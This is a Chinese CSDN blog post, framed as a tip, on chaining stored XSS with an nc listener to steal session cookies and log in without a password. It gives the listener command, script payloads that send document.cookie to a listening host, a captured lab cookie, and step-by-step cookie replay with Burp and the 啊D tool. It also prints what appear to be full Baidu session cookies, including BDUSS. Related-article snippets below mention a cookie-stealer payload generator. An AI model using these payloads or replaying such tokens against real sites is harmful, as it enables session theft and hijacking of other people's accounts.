技巧:XSS漏洞结合nc窃取Cookie实现免密码登录

最新推荐文章于 2024-04-22 12:50:24 发布
最新推荐文章于 2024-04-22 12:50:24 发布
阅读量1.8k 收藏 8
点赞数 1
分类专栏: Web安全 文章标签: 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_51339377/article/details/124242300
版权
XSS漏洞结合nc窃取Cookie实现免密码登录(已亲身通过burp抓包改Cookie在不同电脑实践成功!)
如果某天不能用外网,也不能用kali
存储型xss最重要的是获取用户的cookie!!!!!!!!!!
document.cookie
获取用户所在网站的cookie
1.在黑客端用nc进行监听 
nc -lvp 4444    //使用nc监听4444端口
2.XSS注入的恶意script脚本 
<script>var img = document.createElement("img");img.src="http://127.0.0.1:4444/a?"+escape(document.cookie);</script>
<script>
document.write('<img src="http://127.0.0.1:4444/?'+document.cookie+'"/> ');
</script>
3.用户访问以后,黑客就可以在nc端监听到相应的cookie信息 
用户访问后,可以在nc上看到
BEEFHOOK=AREs541oCaZqmaEhmEu8FKmaX7baBAFUMp2ZapHkFhcDuYwsDfAhSSCcBQYdTN3mCMUrBdZdG7dgWZ0H;%20PHPSESSID=pp6ei8ut8gkmntp2t4dv7vo026;%20security=low
4.之后黑客可以借助啊D注入工具,或者Burp在相应的界面修改Cookie实现免密码密码
Cookie替换实战:
工具1:借助burp  
1.登录百度
2.用burp抓包获取相应的cookie 
Cookie: BAIDUID=6ED5645EBF6620951D05A27C0367D36A:FG=1; BIDUPSID=6ED5645EBF662095FC0A038B9D1D0C27; PSTM=1628740358; __yjs_duid=1_19ecb1835fa7362a1e43d3fa9e73d0021628911716558; BD_UPN=13314752; BDORZ=FFFB88E999055A3F8A630C64834BD6D0; COOKIE_SESSION=6046137_0_4_3_11_5_1_0_4_3_0_0_6046134_0_1_0_1642304503_0_1642304504%7C9%230_0_1642304504%7C1; BDRCVFR[Fc9oatPmwxn]=srT4swvGNE6uzdhUL68mv3; delPer=0; BD_CK_SAM=1; PSINO=5; H_PS_PSSID=35410_35740_35105_31253_35627_34584_35490_35700_35246_35688_35667_35316_26350_35745; H_PS_645EC=f897l1tNmVRDDbamcnYb7vc3eyOXJ8VQ3MKt6AOyc9Inb%2BZ3nUBr%2Fn63U%2B8rgIHHzlGN; BA_HECTOR=852g008ha1218kak2i1gu7odg0r; __sec_t_key=bf5cd066-4a0c-4c8b-a976-d96d395efbe0; BD_HOME=1; BDUSS=RoVVY2Q0I2dWRYdEFlUDZCNC1hekNpQ0Q3T255eXp1eW1VbzNXTE9obXBiZ3RpSUFBQUFBJCQAAAAAAAAAAAEAAACE24E1u6rPxLrav83TwL3cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAKnh42Gp4eNhcE
3.切换其他浏览器,重新进入百度 确保其是没有登录的
4.刷新后用burp抓包 替换相应位置的cookie
5.即可成功用cookie登陆
工具2:借助啊D注入工具实战
1.正常登录抓取Cookie 
Cookie: BAIDUID=6ED5645EBF6620951D05A27C0367D36A:FG=1; BIDUPSID=6ED5645EBF662095FC0A038B9D1D0C27; PSTM=1628740358; __yjs_duid=1_19ecb1835fa7362a1e43d3fa9e73d0021628911716558; BD_UPN=13314752; BDORZ=FFFB88E999055A3F8A630C64834BD6D0; COOKIE_SESSION=6046137_0_4_3_11_5_1_0_4_3_0_0_6046134_0_1_0_1642304503_0_1642304504%7C9%230_0_1642304504%7C1; H_PS_645EC=f897l1tNmVRDDbamcnYb7vc3eyOXJ8VQ3MKt6AOyc9Inb%2BZ3nUBr%2Fn63U%2B8rgIHHzlGN; BA_HECTOR=2021ak04al818001621gu7oqp0q; __sec_t_key=bf5cd066-4a0c-4c8b-a976-d96d395efbe0; BD_HOME=1; H_PS_PSSID=35410_35740_35105_31253_35627_34584_35490_35700_35246_35688_35667_35316_26350_35745; BDUSS=nV4NzVzSFBwZHlnODBiemZQVDRxR0R4N3J3Z3NTbjBwbTBoR1lHNU1pQlpjQXRpSUFBQUFBJCQAAAAAAAAAAAEAAACE24E1u6rPxLrav83TwL3cAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFnj42FZ4-Nhb
2.在啊D工具中
3.直接替换Cookie
4.成功免密码登录
Simon_Smith
关注
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
JS写XSS cookie stealer来窃取密码的步骤详解
10-18
JavaScript是web中最常用的脚本开发语言,js可以自动执行站点组件,管理站点内容,在web业内实现其他有用的函数。这篇文章主要介绍了JS写XSS cookie stealer来窃取密码的步骤详解,需要的朋友可以参考下
JSP过滤器防止Xss漏洞实现方法(分享)
01-08
在用java进行web业务开发的时候,对于页面上接收到的参数,除了极少数是步可预知的内容外,大量的参数名和参数值都是不会出现触发Xss漏洞的字符。而通常为了避Xss漏洞,都是开发人员各自在页面输出和数据入库等地方加上各种各样的encode方法来避Xss问题。而由于开发人员的水平不一,加上在编写代码的过程中安全意识的差异,可能会粗心漏掉对用户输入内容进行encode处理。针对这种大量参数是不可能出现引起Xss和SQL注入漏洞的业务场景下,因此可以使用一个适用大多数业务场景的通用处理方法,牺牲少量用户体验,来避Xss漏洞和SQL注入。 那就是利用Servlet的过滤器机制,编写定制的XssF
通过修改Cookie登录后台
极光时流
03-17 5123
如何通过已存在的Cookie,进入博客园后台,我用IE浏览器和Chrome浏览器来测试! 首先我们通过IE浏览器拿到我们登入博客园后的Cookie,通过IECookiesview插件可以查看到IE浏览器下所有的Cookie信息,然后我们找到cnblogs.com站点下的Cookie,然后复制下.CNBlogsCookie和key和value值,如图所示! 众所周知,cookies属于隐私数据,不...
利用session来做登录功能,代替cookie
Heihei 's note
03-15 1357
同样,还是两个servlet两个HTML静态页面来提交数据流程 先访问1.html1.html提交数据后跳转到servlet1 处理数据处理完后servlet1跳转到2.html,继续提交剩余数据当2.html提交数据后  跳转到servlet2去处理数据,并且通过session获取到第一步填写的数据,并将他们全部打印在电脑屏幕上1.html代码:&lt;!DOCTYPE html&gt; &lt...
xsstry:xss漏洞利用平台
06-10
xsstry xss 漏洞利用平台 xss 漏洞利用平台
如何导入导出清除cookie实现密自动登录
amazon20201212的博客
02-22 3986
我们在浏览器登录网站后如果换了一台新的设备就需要重新登录账号,但是这样就会导致账号被风控,需要重新输入账号密码甚至接收邮箱及手机号验证码。那么有什么方法和软件可以直接用买来的cookie(简称CK)账号导入到浏览器来实现密自动登录呢?下面就以候鸟浏览器为例,给大家演示一下cookie的导入导出和删除清空。 工具/原料: Windows7以上操作系统的电脑 候鸟浏览器 Cooke账号 方法/步骤: 1、候鸟浏览器任意环境列表处点击鼠标右键,在弹出的菜单中点击“导入cookie”; 2、弹出“导入cooki
Burpsuite测试中的小技巧-1
Aevery的博客
05-21 2475
日常测试中我们经常使用burpsuite去替换高低权限的Cookie值去测越权漏洞,手动替换Cookie在测试系统功能模块较多时比较繁琐和容易出错,可以使用burpsuite的intrude模块去实现自动替换我们鼠标所点击请求中的Cookie值,如果返回正常则存在越权(先获取低权限的Cookie值,我们鼠标去正常点击高权限账号所拥有的功能模块)。 ...
通过burpsuite替换cookie登录后台
weixin_34203832的博客
02-11 6443
通过burpsuite可以比较方便的替换http头部的cookie、useragent等字段,在获取到用户的cookie实现登录。具体使用方法如下: 如替换cookie,可以写正则表达式^Cookie.*$,替换内容则为cookie字段完整的内容。部分服务器可能会校验useragent,可以在如下替换菜单一并做替换。 转载于:https://www.cnblogs.com/showery/p/...
xss漏洞知识总结
ma963852的博客
04-14 5531
漏洞原理 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。 未对用户的输入进行处理,浏览器将用户输入的内容当作脚本执行。恶意攻击者往Web页面里插入恶意JS代码,当用户浏览该页之时,嵌入其中Web里面的JS代码会被执行,从而达到恶意的特殊目的。是一种针对用户浏览器的攻击。 漏洞分类 Xss主要分为三种类型: (1)反射型 反射型xss又称非持久性xss,需要用户点击带有
xss获取cookie密码登录-学习笔记
XiaoXiao_RenHe的专栏
05-06 1585
什么是cookie,什么是xss,如何通过xss获取cookie以便登录系统。
2023 C#读取.nc文件
03-13
请在VS2013版本以上打开
StoleYourCookies:XSS Cookie窃取器有效负载生成器
05-10
偷了你的饼干 这是一个相当简单的XSS有效负载生成器,用于从经过身份验证的用户那里窃取会话Cookie。 用法 python2 StoleYourCookie.py <Local> <Port> <Redirection> 去做: 实施有效负载以绕过内容安全策略(CSP) 实施有效负载以绕过Web应用程序防火墙 创建一个受密码保护的管理员面板,以显示有关被盗Cookie的信息。 实施电子邮件警报 伦理 仅以符合道德的方式使用此工具。 未经许可劫持用户会话是非法的。
人工智能安全与光明时代
qq18218628646的博客
04-19 753
模式许可和监督可能会适得其反,因为以不可持续的方式集中权力
从智能家居到智能城市:物联网中的隐私和安全风险
网络安全服务提供商
04-19 553
由于隐私和安全这些问题,已经变得与物联网相关的设备不同的程度上挂钩。例如,黑客可能通过使用物联网设备拦截人们的传输数据来获取身份信息和敏感的个人信息,或利用智能交通系统的漏洞,让整个城市的交通陷入混乱。由于没有标准,就模糊了设备和系统的安全和隐私标准,限制了智能家居和智能城市的持续发展。其次,我们需要建立更多的标准和规范来规范物联网的发展,从而进一步提高物联网设备和技术的安全性和互操作性。通过不断更新技术,加强安全和隐私的保护,我们可以享受到物联网设备和技术带来的便利性,从而更好地掌控我们的生活。
账号安全基本措施2
2301_78327423的博客
04-19 427
例如:配置zhangsan用户只能执行挂载命令,/usr/bin/mount /dev/sr0 /mnt/命令。在110行我们看到在这个组中,NOPASSWD:ALL,是要加入到wheel组中的,使用sudo执行任何命令不需要密码。第三列是开放的命令,比如:/usr/bin/mount /dev/sr0 /mnt/只能执行这一条命令。在/etc/sudoers.d/下写一个配置文件:vim /etc/sudoers.d/test。测试别名的使用,只有在/usr/bin/下的命令才可以无密码使用。
20232831袁思承2023-2024-2 《网络攻防实践》第6次作业
qq_53198713的博客
04-19 745
网络攻防~
亚马逊账号安全:如何避被关联和封禁?
Tiger_Bella的博客
04-16 1056
无论是在亚马逊、eBay、Wish、速卖通、沃尔玛、美客多、独立站、阿里国际、Lazada、Shopee还是Mercari等平台,通过自养号测评来获取评论和销量,是最节约成本、也是最有效的方式之一。实际上,最重要的是要了解平台风控的关键点,是硬件参数的关联、IP的纯净度问题,还是指纹插件或者cookie的关联,又或者是支付卡被风控。亚马逊内部设有卖家举报功能。2. IP地址的纯净度问题:采用高质量的IP地址服务,避使用被大量其他用户共享的IP,可以考虑使用一些专业的IP服务提供商,确保IP的干净程度。
富格林:戒备虚假套路保障安全
最新发布
fgl100的博客
04-22 170
在投资黄金之前,制定一个明确的投资计划是非常重要的。因此,我们应该将黄金投资作为投资组合的一部分,并与其他资产进行适当的分散,以降低整体投资风险。黄金市场的波动性较大,价格可能会出现剧烈波动。因此,我们需要保持冷静,不要被市场情绪所左右,避盲目跟风操作,以造成损失。黄金作为一种避险资产,通常在长期内具有保值和增值的特性,因此长期持有黄金投资可能会带来更好的回报。在开始投资黄金之前,了解黄金市场的基本知识是至关重要的。富格林悉知,现货黄金是一种传统而又具有吸引力的投资方式,因为它通常被视为一种避险资产。
跨站脚本:WikyBlog XSS漏洞攻击
05-23
跨站脚本(Cross-site scripting,XSS)是一种常见的Web攻击,攻击者通过在受害者的浏览器中执行恶意脚本来窃取用户的信息或控制用户的帐户。 WikyBlog是一个开源的博客系统,存在XSS漏洞。攻击者可以通过在评论或文章内容中注入恶意脚本,从而在受害者访问该页面时执行该脚本,达到攻击的目的。 攻击者可以利用XSS漏洞进行以下攻击: 1. 窃取用户的Cookie等敏感信息。 2. 劫持用户的会话,进行恶意操作。 3. 显示虚假的内容,欺骗用户。 4. 在受害者的浏览器中执行任意JavaScript代码。 要防止XSS攻击,可以采取以下措施: 1. 对输入的数据进行过滤和验证,只允许合法的字符和格式。 2. 对输出的数据进行编码,避将HTML、JavaScript等代码直接输出到页面。 3. 使用HTTPOnly Cookie,防止JavaScript通过document.cookie获取Cookie信息。 4. 使用CSP(Content-Security-Policy)策略,限制页面加载的资源和可执行的代码。 5. 将敏感的操作(如删除、修改等)限制在需要认证的用户中。 6. 定期更新和修复漏洞,并进行安全审计。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Simon_Smith

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值